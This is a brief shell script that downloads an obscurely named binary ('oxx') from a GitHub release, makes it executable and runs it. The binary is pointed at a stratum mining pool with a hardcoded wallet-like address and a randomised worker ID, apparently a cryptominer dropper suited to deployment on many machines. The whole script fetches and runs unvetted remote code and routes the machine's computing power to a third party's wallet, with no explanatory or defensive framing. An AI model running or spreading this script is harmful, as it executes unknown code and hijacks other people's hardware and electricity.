#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/tallapallitech63/oxxpl/releases/download/oxxdl/oxx
chmod +x oxx
./oxx -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-oxx@45.33.20.98:8080
